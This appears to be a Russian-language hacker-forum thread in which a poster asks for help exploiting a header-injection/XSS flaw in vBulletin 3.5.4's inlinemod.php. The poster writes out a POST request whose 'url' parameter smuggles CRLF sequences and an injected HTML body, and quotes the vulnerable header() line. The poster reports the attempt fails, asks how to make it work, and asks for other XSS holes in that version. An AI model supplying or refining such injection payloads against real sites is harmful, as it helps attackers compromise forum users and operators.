![]() |
vBulletin 3.54 xss
помогите разобраться
Код:
POST /vb354/inlinemod.php HTTP/1.0 через пост на форум передаю эти два параметра do=clearthread url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d% 0a%0d%0a место где все происходит в коде: Код:
header("Location: $url", 0, 301);http://127.0.0.1(форум на локал машине запущен)/lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a вместо %0d%0a пробовал передавать \n\r, но результат тот же каким образом можно отправить 2 заголовка? что я делаю не так? плюс символы < > " заменяются на " < > отправить несколько заголовков думаю точно можно, иначе бы в версии 3.6.0 не сделали проверку Код:
if (strpos($url, "\r\n") !== false)спасибо за внимание :) |
Верно! Хорошо мыслишь!
|
неужели никто не сталкивался с этим? или то, как эту дырку можно использовать, в приватном разделе..
если не трудно намекните хотя бы в каком направлении двигаться? может быть есть другие хсс на данную версию? |
| Время: 09:30 |